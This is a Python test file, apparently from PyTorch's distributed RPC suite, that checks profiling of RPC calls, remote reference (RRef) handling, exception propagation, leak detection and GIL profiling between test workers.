def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with _profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_double_end_callbacks_new_signatures(self):
# Test the new _record_function ops work
# Note: Remove once record_function uses these directly
num_sleep_seconds = 1
if self.rank == 1:
with _profile() as pf:
try:
record = torch.ops.profiler._record_function_enter_new("foo", None)
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
torch.ops.profiler._call_end_callbacks_on_jit_fut(record, fut)
finally:
torch.ops.profiler._record_function_exit(record)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# context manager before the remote function has ran.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
self._builtin_remote_ret(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_self(self):
self._builtin_remote_self(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
@dist_init
def test_multi_builtin_remote_ret(self):
self._test_multi_remote_call(
torch.add, False,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
@dist_init
def test_multi_py_udf_remote(self):
self._test_multi_remote_call(
my_function,
False,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args(self):
self._py_rref_args(
torch.ones(2, 2),
1,
torch.ones(2, 2),
2,
torch.ones(2, 2) * 2 + 3)
@dist_init
def test_py_rref_args_user_share(self):
self._py_rref_args_user_share(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rpc_rref_args(self):
self._py_rpc_rref_args(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_nested_remote(self):
self._nested_remote(
nested_remote,
torch.ones(2, 2) + 3
)
@dist_init
def test_nested_rref(self):
self._nested_rref(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_stress(self):
self._nested_rref_stress(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to timeout
# errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error message is thrown if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
# 10 ms timeout
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote objet
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
